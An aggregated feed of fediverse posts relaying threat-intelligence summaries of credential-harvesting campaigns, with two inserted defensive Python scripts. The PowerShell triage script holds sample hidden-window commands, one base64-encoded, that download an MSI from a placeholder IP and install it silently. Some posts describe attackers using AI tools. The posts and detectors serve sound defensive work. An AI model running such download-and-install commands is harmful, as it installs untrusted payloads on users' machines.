home.social

#credential-harvesting — Public Fediverse posts

Live and recent posts from across the Fediverse tagged #credential-harvesting, aggregated by home.social.

  1. Mysterious hacker organization operating secretly for 6 years is exploiting critical cPanel vulnerability to deploy backdoor trojans

    A previously unknown threat group designated Mr_Rot13 has been exploiting CVE-2026-41940, a critical authentication bypass vulnerability in cPanel & WHM, to compromise Linux servers globally. Active since at least 2020, the group deploys a Go-based payload installer that plants SSH keys, PHP webshells, malicious JavaScript for credential harvesting, and a cross-platform remote access tool called Filemanager. Stolen data is exfiltrated to attacker-controlled Telegram channels and command servers. The group has maintained operational security for six years with extremely low detection rates. Attack infrastructure includes domains registered as early as 2020, with over 2,000 attacking IP addresses observed worldwide. The campaign primarily targets cPanel installations and WordPress systems, with confirmed compromise of Southeast Asian government and military entities resulting in 4.37GB of sensitive data theft.

    Pulse ID: 6a01847e13b4074a8d4b6381
    Pulse Link: otx.alienvault.com/pulse/6a018
    Pulse Author: AlienVault
    Created: 2026-05-11 07:25:50

    Be advised, this data is unverified and should be considered preliminary. Always do further verification.

    #Asia #BackDoor #CredentialHarvesting #CyberSecurity #DataTheft #Government #InfoSec #Java #JavaScript #Linux #Military #OTX #OpenThreatExchange #PHP #RAT #RDP #SSH #Telegram #Trojan #Troll #Vulnerability #Word #Wordpress #bot #AlienVault

  2. TCLBANKER: Brazilian Banking Trojan Spreading via WhatsApp and Outlook

    A sophisticated Brazilian banking trojan named TCLBANKER has been identified, representing a significant evolution of the MAVERICK/SORVEPOTEL malware family. The campaign employs a trojanized Logitech installer that deploys two .NET Reactor-protected modules through DLL side-loading. The banking trojan monitors 59 Brazilian financial institutions using UI Automation and features a WPF-based full-screen overlay framework for operator-driven social engineering attacks, including credential harvesting and fake system screens. A secondary worm module enables self-propagation through WhatsApp session hijacking and Outlook COM automation, sending phishing messages from victims' own accounts. The malware implements robust anti-analysis capabilities including environment-gated payload decryption, comprehensive watchdog systems, and ETW patching. Infrastructure is hosted on Cloudflare Workers, with evidence suggesting the campaign was detected in early operational stages.

    Pulse ID: 69fb97e531a95b262c4925aa
    Pulse Link: otx.alienvault.com/pulse/69fb9
    Pulse Author: AlienVault
    Created: 2026-05-06 19:35:01

    Be advised, this data is unverified and should be considered preliminary. Always do further verification.

    #Bank #BankingTrojan #Brazil #Cloud #CredentialHarvesting #CyberSecurity #ELF #InfoSec #Malware #NET #OTX #OpenThreatExchange #Outlook #Phishing #RAT #SocialEngineering #Trojan #WatchDog #WhatsApp #Worm #bot #AlienVault

  3. Operation GriefLure: Dissecting an APT Campaign Targeting Vietnam's Military Telecom & Philippine Healthcare

    A sophisticated spear phishing campaign dubbed Operation GriefLure targeted senior executives of Viettel Group, Vietnam's largest military-owned telecommunications provider, and St. Luke's Medical Center in the Philippines. The operation weaponized authentic legal documents from a genuine data breach dispute involving a Vietnamese citizen and Viettel, alongside fabricated whistleblower complaints targeting Philippine healthcare administrators. Attackers delivered malicious Windows LNK files within nested RAR archives, abusing native ftp.exe as a Living-off-the-Land dropper. Upon execution, the payload assembled polymorphic implants directly on disk from chunked .doc files, establishing persistence while displaying legitimate decoy PDFs. The malware enabled remote access through process injection, credential harvesting from browsers and remote access tools, screenshot capture, and file exfiltration via HTTPS C2 communication to infrastructure hosted on bulletproof Hong Kong servers.

    Pulse ID: 69fc841d0cbc4c199d708315
    Pulse Link: otx.alienvault.com/pulse/69fc8
    Pulse Author: AlienVault
    Created: 2026-05-07 12:22:53

    Be advised, this data is unverified and should be considered preliminary. Always do further verification.

    #Browser #CredentialHarvesting #CyberSecurity #DataBreach #HTTP #HTTPS #Healthcare #HongKong #InfoSec #LNK #Malware #Military #OTX #OpenThreatExchange #PDF #Philippines #Phishing #RAT #SpearPhishing #Telecom #Telecommunication #UK #Vietnam #Windows #bot #AlienVault

  4. Inside Shadow-Earth-053: A China-Aligned Cyberespionage Campaign Against Government and Defense Sectors in Asia

    A China-aligned threat group designated SHADOW-EARTH-053 has been conducting cyberespionage operations against government entities and critical infrastructure across at least eight countries in South, East, and Southeast Asia, plus one NATO member state, since December 2024. The group exploits unpatched Microsoft Exchange vulnerabilities, particularly the ProxyLogon chain, to gain initial access and deploys GODZILLA web shells for persistence. ShadowPad implants are staged via DLL sideloading of legitimate signed executables. Nearly half of the compromised environments showed overlap with another intrusion set, SHADOW-EARTH-054, sharing identical tooling including Evil-CreateDump and IOX proxy. The attackers conduct extensive Active Directory reconnaissance, credential harvesting, and mailbox exfiltration targeting high-profile government officials and defense contractors. Multiple tunneling tools including GOST and Wstunnel establish covert command-and-control channels, while lateral movement leverages WM...

    Pulse ID: 69f3a95eda9a5492f5d1b6f4
    Pulse Link: otx.alienvault.com/pulse/69f3a
    Pulse Author: AlienVault
    Created: 2026-04-30 19:11:26

    Be advised, this data is unverified and should be considered preliminary. Always do further verification.

    #Asia #China #CredentialHarvesting #CyberSecurity #Cyberespionage #Espionage #Government #InfoSec #Microsoft #NATO #OTX #OpenThreatExchange #Proxy #RAT #ShadowPad #SideLoading #bot #AlienVault

  5. Large Scale Smishing & Credential Harvesting Campaign using Phoenix PhaaS

    A Phishing-as-a-Service platform called Phoenix provides ready-made tools and infrastructure that enable large-scale smishing campaigns.

    Pulse ID: 69f64e5ad6a8f740297614e5
    Pulse Link: otx.alienvault.com/pulse/69f64
    Pulse Author: cryptocti
    Created: 2026-05-02 19:19:54

    Be advised, this data is unverified and should be considered preliminary. Always do further verification.

    #CredentialHarvesting #CyberSecurity #InfoSec #OTX #OpenThreatExchange #Phishing #Smishing #bot #cryptocti

  6. User interaction with a ClickFix-style phishing site resulted in execution of an obfuscated PowerShell command

    A ClickFix-style phishing campaign leveraged social engineering to trick users into executing obfuscated PowerShell commands that downloaded and installed a malicious MSI payload from a remote server. The attack employed a sophisticated multi-stage infection chain utilizing DLL sideloading techniques with renamed legitimate binaries to execute malicious components. The final payload deployed HijackLoader to deliver a Lumma-style information stealer designed for credential harvesting and data exfiltration. The campaign utilized multiple command-and-control domains and infrastructure hosted on specific IP addresses. Mitigation measures include blocking identified artifacts, enhancing user awareness about ClickFix social engineering tactics, implementing endpoint detection for suspicious PowerShell activity and unsigned DLL sideloading, and isolating compromised systems for remediation.

    Pulse ID: 69f1de85544538ce8b03332a
    Pulse Link: otx.alienvault.com/pulse/69f1d
    Pulse Author: AlienVault
    Created: 2026-04-29 10:33:41

    Be advised, this data is unverified and should be considered preliminary. Always do further verification.

    #CredentialHarvesting #CyberSecurity #Endpoint #HijackLoader #ICS #InfoSec #OTX #OpenThreatExchange #Phishing #PowerShell #RAT #SideLoading #SocialEngineering #bot #AlienVault
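Editor's added example (not part of the post above, and not the campaign's command line): the post recommends endpoint detection for the PowerShell that a ClickFix page asks the user to paste. The script below scores process-creation events for the traits such one-liners tend to share (hidden window, policy bypass, download plus MSI install, IP-literal URL, explorer.exe as parent) and decodes an -EncodedCommand blob so the inner script is scored as well. The events, weights and threshold are assumptions for illustration.

```python
"""Triage PowerShell process-creation events for ClickFix-style launches.

Added example; the events, the indicator weights and the threshold are
assumptions for illustration, not indicators from the pulse.
"""
import base64
import re

# Weighted indicators commonly seen in a pasted "fix" one-liner.
INDICATORS = [
    ("hidden window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 2),
    ("no profile", re.compile(r"-no(?:p|profile)\b", re.I), 1),
    ("execution policy bypass", re.compile(r"-e(?:p|xecutionpolicy)\s+bypass", re.I), 2),
    ("web download", re.compile(r"\biwr\b|\birm\b|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile", re.I), 2),
    ("in-memory execution", re.compile(r"\biex\b|invoke-expression", re.I), 2),
    ("MSI install from command line", re.compile(r"msiexec(?:\.exe)?\s+/i\b", re.I), 2),
    ("IP-literal URL", re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}", re.I), 2),
]
# -enc / -EncodedCommand / -ec followed by a base64 blob (UTF-16LE script inside).
ENCODED = re.compile(r"-e(?:nc|ncodedcommand|c)?\s+([A-Za-z0-9+/=]{16,})", re.I)
SUSPICIOUS_AT = 6


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if absent or malformed."""
    m = ENCODED.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(event: dict) -> dict:
    """Score one event (parent image, image, command line) and list what matched."""
    text = event["cmdline"]
    decoded = decode_encoded_command(text)
    hits, score = [], 0
    if decoded is not None:
        hits.append("encoded command")
        score += 2
        text = text + "\n" + decoded          # scan the decoded script too
    for name, rx, weight in INDICATORS:
        if rx.search(text):
            hits.append(name)
            score += weight
    # Run dialog (Win+R) and Explorer launches have explorer.exe as parent;
    # scripts started by a scheduler or service normally do not.
    if event["parent"].lower() == "explorer.exe":
        hits.append("interactive launch from explorer.exe")
        score += 2
    return {"score": score, "hits": hits, "decoded": decoded, "suspicious": score >= SUSPICIOUS_AT}


def triage_all(events):
    """Return only the events that cross the threshold, highest score first."""
    flagged = [dict(e, **triage(e)) for e in events]
    flagged = [f for f in flagged if f["suspicious"]]
    return sorted(flagged, key=lambda f: f["score"], reverse=True)


# Constructed sample events (not real telemetry). The second one carries a
# base64/UTF-16LE encoded script built here so the decoder has something to unpack.
_INNER = (
    "$u='http://203.0.113.10/upd.msi';"
    "(New-Object Net.WebClient).DownloadFile($u, \"$env:TEMP\\u.msi\");"
    "msiexec /i \"$env:TEMP\\u.msi\" /qn"
)
_ENC = base64.b64encode(_INNER.encode("utf-16-le")).decode("ascii")
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": 'powershell.exe -nop -w hidden -ep bypass -c "iwr http://203.0.113.10/x.msi '
                '-OutFile $env:TEMP\\a.msi; msiexec /i $env:TEMP\\a.msi /qn"'},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {_ENC}"},
    {"parent": "services.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy RemoteSigned -File C:\\scripts\\inventory.ps1"},
]

if __name__ == "__main__":
    for f in triage_all(SAMPLE_EVENTS):
        print(f["score"], f["hits"])
        if f["decoded"]:
            print("  decoded:", f["decoded"])
```

The parent-process signal is the cheap one: a PowerShell spawned by explorer.exe with a hidden window and a download is almost never an administrator's script, while the same flags under a scheduler or management agent are routine. Tune the weights against your own baseline before alerting on the threshold.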

  7. Inside a Fake DHL Campaign Built to Steal Credentials

    A consumer-targeted credential theft operation uses DHL brand impersonation combined with a fake OTP verification mechanism to harvest passwords from victims. The attack employs an 11-step chain beginning with spoofed shipment notification emails, leading victims through a client-side generated OTP page that creates false trust, then directing them to a DHL-branded credential harvesting portal. The kit captures passwords alongside victim telemetry including IP address, device details, browser fingerprinting, and geolocation data. Exfiltration occurs through EmailJS, a legitimate client-side email service, sending stolen credentials to an attacker-controlled Tutamail address. The campaign concludes by redirecting victims to the legitimate DHL website to avoid suspicion, demonstrating how familiar workflows and brand trust can be weaponized without technical sophistication.

    Pulse ID: 69f11f15737a6a70e077e9d7
    Pulse Link: otx.alienvault.com/pulse/69f11
    Pulse Author: AlienVault
    Created: 2026-04-28 20:56:53

    Be advised, this data is unverified and should be considered preliminary. Always do further verification.

    #Browser #CredentialHarvesting #CyberSecurity #Email #InfoSec #OTX #OpenThreatExchange #Password #Passwords #RAT #Rust #Troll #Word #bot #AlienVault

  8. Tall Tales: How Chinese Actors Use Impersonation and Stolen Narratives to Perpetuate Digital Transnational Repression

    In collaboration with the International Consortium of Investigative Journalists (ICIJ), two distinct actor clusters aligned with the People's Republic of China were identified targeting journalists and civil society members. GLITTER CARP conducted widespread credential harvesting campaigns against Uyghur, Tibetan, Taiwanese, and Hong Kong diaspora activists, as well as journalists covering these communities, employing digital impersonation and fake security alerts while frequently reusing infrastructure. SEQUIN CARP specifically targeted journalists involved in ICIJ's China Targets investigation using sophisticated OAuth consent phishing attacks with well-developed personas based on co-opted narratives, though operational mistakes revealed poor persona management. Both campaigns demonstrate China's Military-Civil Fusion system leveraging private contractors to conduct digital transnational repression at scale, with targeting intensifying following the China Targets publication that exposed Chinese governme...

    Pulse ID: 69f05d291d899793ddba04f9
    Pulse Link: otx.alienvault.com/pulse/69f05
    Pulse Author: AlienVault
    Created: 2026-04-28 07:09:29

    Be advised, this data is unverified and should be considered preliminary. Always do further verification.

    #China #Chinese #CredentialHarvesting #CyberSecurity #HongKong #InfoSec #Military #OTX #OpenThreatExchange #Phishing #RAT #Tibet #bot #AlienVault

  9. A Third Vultr Seoul Box: 60+ Kimsuky Domains, 18 Months of DDNS Rotation, and a 5-Year Infrastructure Trail

    This analysis documents a third Vultr Seoul VPS (158.247.210.58) associated with Kimsuky operations, featuring over 60 domains across an 18-month period of systematic credential harvesting infrastructure. The actor demonstrates deliberate rotation through seven DDNS providers to evade blocklisting while maintaining the same backend VPS since at least September 2020. The domains systematically impersonate Naver, Korean National Tax Service (HomeTax), and government portals using prefixes like nid-user, n-store, nts-auth, and htax-login. Currently, 31 domains actively resolve while web ports remain closed, indicating a parked and ready operational posture. The infrastructure sits in AS20473 alongside two previously documented Vultr Seoul boxes, demonstrating the actor's clear preference for this provider and geographic proximity to South Korean targets.

    Pulse ID: 69f06a838f5dae965dd8cbfd
    Pulse Link: otx.alienvault.com/pulse/69f06
    Pulse Author: AlienVault
    Created: 2026-04-28 08:06:27

    Be advised, this data is unverified and should be considered preliminary. Always do further verification.

    #CredentialHarvesting #CyberSecurity #DNS #Government #InfoSec #Kimsuky #Korea #OTX #OpenThreatExchange #RAT #SouthKorea #UK #Vultr #bot #AlienVault
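Editor's added example (not part of the post above, and not the analyst's tooling): the post gives the building blocks of the hunt it describes, namely hostnames built from brand prefixes such as nid-user, n-store, nts-auth and htax-login, rotation across dynamic-DNS providers, and a "parked" state where names resolve but no web port answers. The script below turns those into checks over constructed resolution data: brand-token matching on hostname labels, a DDNS-zone test, a live/parked/unresolved classification, and grouping by backend IP. The domains, IPs, port data and DDNS zone list are assumptions, not the pulse's IOCs.

```python
"""Flag brand-impersonation hostnames on dynamic-DNS providers and spot
infrastructure that resolves but serves nothing yet ("parked").

Added example; the domains, IPs, port data and the DDNS provider list below
are constructed for illustration, not the pulse's IOCs. The prefixes come
from the pulse's description (nid-user, n-store, nts-auth, htax-login).
"""
from collections import defaultdict

# Brand tokens to look for in hostname labels; hyphenated tokens are matched as
# substrings, single tokens must be a whole hyphen-separated part of the label.
BRAND_TOKENS = {
    "naver": ("nid", "naver", "n-store", "nstore"),
    "hometax": ("hometax", "htax", "nts"),
}
# Assumed DDNS zones for the example; a real list would come from threat intel.
DDNS_ZONES = {"duckdns.org", "hopto.org", "ddns.net", "dynu.net", "no-ip.org", "myftp.biz", "freeddns.org"}
WEB_PORTS = {80, 443, 8080, 8443}


def brand_hits(domain: str):
    """Return the brands whose tokens appear in any label of the hostname except the TLD."""
    labels = domain.lower().rstrip(".").split(".")
    found = []
    for brand, tokens in BRAND_TOKENS.items():
        for label in labels[:-1]:
            parts = label.split("-")
            if any((tok in label) if "-" in tok else (tok in parts) for tok in tokens):
                found.append(brand)
                break
    return found


def is_ddns(domain: str) -> bool:
    """True when the hostname sits under one of the known dynamic-DNS zones."""
    labels = domain.lower().rstrip(".").split(".")
    return len(labels) >= 3 and ".".join(labels[-2:]) in DDNS_ZONES


def classify(record: dict) -> dict:
    """Join the name heuristics with resolution/port data for one hostname."""
    if record["resolves_to"] is None:
        state = "unresolved"
    elif WEB_PORTS.intersection(record["open_ports"]):
        state = "live"
    else:
        state = "parked"      # resolves, but no web listener: staged for later use
    return {
        "domain": record["domain"],
        "brands": brand_hits(record["domain"]),
        "ddns": is_ddns(record["domain"]),
        "state": state,
    }


def cluster_by_ip(records):
    """Group brand-impersonating hostnames by the backend IP they resolve to."""
    groups = defaultdict(list)
    for r in records:
        c = classify(r)
        if c["brands"] and r["resolves_to"]:
            groups[r["resolves_to"]].append(c["domain"])
    return dict(groups)


# Constructed sample resolution data (documentation ranges, not real hosts).
SAMPLE_RECORDS = [
    {"domain": "nid-user-login.duckdns.org", "resolves_to": "198.51.100.7", "open_ports": []},
    {"domain": "nts-auth-check.hopto.org", "resolves_to": "198.51.100.7", "open_ports": []},
    {"domain": "htax-login-verify.ddns.net", "resolves_to": "198.51.100.7", "open_ports": [443]},
    {"domain": "n-store-support.dynu.net", "resolves_to": None, "open_ports": []},
    {"domain": "weather-feed.example.net", "resolves_to": "192.0.2.44", "open_ports": [443]},
]

if __name__ == "__main__":
    for r in SAMPLE_RECORDS:
        print(classify(r))
    print(cluster_by_ip(SAMPLE_RECORDS))
```

The point of the IP grouping is the one the post makes: blocking individual DDNS names is a losing game when the actor rotates providers, whereas a backend address that has hosted brand-lookalike names for months is a stable pivot, and a "parked" name pointing at it is worth blocking before it goes live.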

  10. Extortion in the Enterprise: Defending Against BlackFile Attacks

    Since February 2026, multiple incidents involving data theft and extortion have been attributed to activity cluster CL-CRI-1116, also known as BlackFile, UNC6671, and Cordial Spider. These financially-motivated attackers, likely associated with "The Com" collective, employ voice-based phishing combined with credential harvesting through fraudulent login pages. They impersonate IT support staff to steal credentials and bypass multi-factor authentication. The attackers focus on Living Off the Land techniques, abusing legitimate APIs like Microsoft Graph to access SharePoint sites and Salesforce data. They search for confidential information and employee data within SaaS environments, then exfiltrate it through browser downloads or API exports. To pressure victims into paying seven-figure ransoms, attackers send demands via Gmail and compromised email accounts, sometimes employing SWATting tactics against executives.

    Pulse ID: 69ef8ab862c07db686ca4572
    Pulse Link: otx.alienvault.com/pulse/69ef8
    Pulse Author: AlienVault
    Created: 2026-04-27 16:11:35

    Be advised, this data is unverified and should be considered preliminary. Always do further verification.

    #Browser #CredentialHarvesting #CyberSecurity #DataTheft #Email #Extortion #ICS #InfoSec #Microsoft #OTX #OpenThreatExchange #Phishing #RAT #RCE #bot #AlienVault

  11. Phishing Attack via Adobe-Themed Lure Delivering ScreenConnect and Credential Harvesting Tools

    Pulse ID: 69eaf8302d013c66b8a8493c
    Pulse Link: otx.alienvault.com/pulse/69eaf
    Pulse Author: Tr1sa111
    Created: 2026-04-24 04:57:20

    Be advised, this data is unverified and should be considered preliminary. Always do further verification.

    #Adobe #CredentialHarvesting #CyberSecurity #InfoSec #OTX #OpenThreatExchange #Phishing #ScreenConnect #bot #Tr1sa111

  12. Phishing Attack via Adobe-Themed Lure Delivering ScreenConnect and Credential Harvesting Tools

    A phishing campaign utilized a fraudulent Adobe-themed website to trick victims into downloading and executing ScreenConnect remote access software. Once initial access was established, threat actors conducted interactive operations deploying multiple malicious binaries including a credential harvesting tool named password.exe. The attackers also exploited the ms-phone URI handler to launch the Phone Link application, attempting to socially engineer victims into linking their mobile devices to potentially capture notifications, authentication prompts, and sensitive information. The attack demonstrates a multi-stage compromise focusing on persistence establishment, credential theft, and preparation for potential lateral movement across the victim's network infrastructure.

    Pulse ID: 69e9d7f4b00e56e9ebb52338
    Pulse Link: otx.alienvault.com/pulse/69e9d
    Pulse Author: AlienVault
    Created: 2026-04-23 08:27:32

    Be advised, this data is unverified and should be considered preliminary. Always do further verification.

    #Adobe #CredentialHarvesting #CyberSecurity #InfoSec #OTX #OpenThreatExchange #Password #Phishing #RAT #ScreenConnect #Word #bot #AlienVault

  13. Bissa Scanner Exposed: AI-Assisted Mass Exploitation and Credential Harvesting - The DFIR Report

    DFIR Labs is an artificial intelligence (AI) research and development company, which developed tools for mass exploitation and collection of data, including the Bissa scanner, React2Shell, and other tools.

    Pulse ID: 69e9a5910752d9f4d8c32ec2
    Pulse Link: otx.alienvault.com/pulse/69e9a
    Pulse Author: Tr1sa111
    Created: 2026-04-23 04:52:33

    Be advised, this data is unverified and should be considered preliminary. Always do further verification.

    #CredentialHarvesting #CyberSecurity #InfoSec #OTX #OpenThreatExchange #bot #Tr1sa111

  14. AI-augmented threat actor accesses FortiGate devices at scale

    A Russian-speaking financially motivated threat actor leveraged multiple commercial generative AI services to compromise over 600 FortiGate devices across more than 55 countries between January and February 2026. The campaign exploited exposed management ports and weak credentials with single-factor authentication rather than software vulnerabilities. The actor used AI throughout all operational phases including tool development, attack planning, and reconnaissance automation, achieving scale previously requiring larger skilled teams. Post-exploitation activities included Active Directory compromise, credential harvesting, and targeting backup infrastructure consistent with pre-ransomware operations. Despite limited technical capabilities, the actor successfully extracted complete credential databases from multiple organizations, though they failed against hardened environments and moved to softer targets.

    Pulse ID: 69e7a3cf924f430e51c91879
    Pulse Link: otx.alienvault.com/pulse/69e7a
    Pulse Author: AlienVault
    Created: 2026-04-21 16:20:31

    Be advised, this data is unverified and should be considered preliminary. Always do further verification.

    #CredentialHarvesting #CyberSecurity #InfoSec #OTX #OpenThreatExchange #RAT #RansomWare #Russia #bot #AlienVault

  15. FlowerStorm Phishing Kit Targeting Microsoft Credentials via Cloudflare-Backed Infrastructure

    IOCs related to a FlowerStorm phishing-kit-driven campaign that delivers fake Microsoft authentication pages via compromised domains fronted by Cloudflare. The activity abuses legitimate cloud and CDN services for delivery while credential harvesting occurs on attacker-controlled infrastructure, with incidental contact to Microsoft services during normal browser behavior. The kit uses its own web servers to target victims' login credentials and access to their personal details and login details on its servers.

    Pulse ID: 69e628228cf9938a05a3c669
    Pulse Link: otx.alienvault.com/pulse/69e62
    Pulse Author: AlienVault
    Created: 2026-04-20 13:20:34

    Be advised, this data is unverified and should be considered preliminary. Always do further verification.

    #Browser #CDN #Cloud #CredentialHarvesting #CyberSecurity #InfoSec #Microsoft #OTX #OpenThreatExchange #Phishing #Troll #bot #AlienVault

  16. Untangling a Linux Incident With an OpenAI Twist

    A technology sector organization experienced a multi-actor compromise on a Linux endpoint where cryptominers were deployed and credential harvesting occurred. The incident became complex when the legitimate user attempted to troubleshoot suspected malicious activity using OpenAI's Codex AI agent while threat actors remained active on the system. The EDR agent was installed mid-compromise, limiting historical visibility. Codex-generated commands created investigative challenges as they mimicked attacker techniques, triggering security detections and complicating the distinction between legitimate troubleshooting and malicious activity. While Codex helped terminate some malicious processes, it failed to provide complete remediation, allowing threat actors to continue exfiltrating credentials, tokens, and cloud metadata through multiple persistence mechanisms.

    Pulse ID: 69e2417e5e4fdd5f16c75dbe
    Pulse Link: otx.alienvault.com/pulse/69e24
    Pulse Author: AlienVault
    Created: 2026-04-17 14:19:42

    Be advised, this data is unverified and should be considered preliminary. Always do further verification.

    #Cloud #CredentialHarvesting #CryptoMiner #CyberSecurity #EDR #Endpoint #InfoSec #Linux #Mimic #OTX #OpenThreatExchange #RAT #SMS #bot #AlienVault

  17. Using KATA and KEDR to detect the AdaptixC2 agent

    AdaptixC2 is an emerging open-source post-exploitation framework rapidly adopted by threat actors in APT attacks and ransomware campaigns. Written in Go and C++, it supports Windows, macOS, and Linux with extensive modularity through Beacon Object Files (BOFs). The framework enables diverse command-and-control channels including HTTP/S, TCP, mTLS, DNS, DoH, and SMB with RC4 encryption throughout. It implements sophisticated evasion techniques targeting both network detection systems and endpoint defenses. Despite advanced obfuscation capabilities, network-level detection remains viable through analysis of distinctive communication patterns, header structures, and behavioral indicators. The framework supports credential harvesting via LSASS dumping, LAPS exploitation, and Kerberos attacks, alongside defense evasion through process injection and lateral movement via WinRM and PsExec. Combined NDR and EDR solutions provide effective multi-layered detection coverage against AdaptixC2 operations across network ...

    Pulse ID: 69e2824daddc65cc4bab207d
    Pulse Link: otx.alienvault.com/pulse/69e28
    Pulse Author: AlienVault
    Created: 2026-04-17 18:56:13

    Be advised, this data is unverified and should be considered preliminary. Always do further verification.

    #CredentialHarvesting #CyberSecurity #DNS #EDR #Encryption #Endpoint #HTTP #InfoSec #Linux #Mac #MacOS #OTX #OpenThreatExchange #PsExec #RAT #RCE #RansomWare #SMB #TCP #TLS #Windows #bot #AlienVault

  18. Dissecting macOS intrusion from lure to compromise

    Microsoft Threat Intelligence uncovered a macOS-focused cyber campaign by North Korean threat actor Sapphire Sleet utilizing social engineering to compromise systems. The attack chain begins with a malicious AppleScript file disguised as a Zoom SDK update, which executes cascading payloads through curl-to-osascript chains. The campaign deploys multiple backdoors including com.apple.cli, services, icloudz, and com.google.chromes.updaters for persistence and command execution. Credential harvesting occurs through fake system dialogs that mimic legitimate macOS password prompts. The threat actor bypasses Transparency, Consent, and Control protections by directly manipulating the TCC database, enabling extensive data exfiltration targeting cryptocurrency wallets, browser credentials, Telegram sessions, SSH keys, and Apple Notes. Operations focus on cryptocurrency, finance, and blockchain organizations with the primary objective of stealing digital assets.

    Pulse ID: 69e1f157d8f8bb7547f8c23f
    Pulse Link: otx.alienvault.com/pulse/69e1f
    Pulse Author: AlienVault
    Created: 2026-04-17 08:37:43

    Be advised, this data is unverified and should be considered preliminary. Always do further verification.

    #BackDoor #BlockChain #Browser #Chrome #Cloud #CredentialHarvesting #CyberSecurity #Google #InfoSec #Korea #Mac #MacOS #Microsoft #Mimic #NorthKorea #OTX #OpenThreatExchange #Password #RAT #SSH #SocialEngineering #Telegram #Word #Zoom #bot #cryptocurrency #AlienVault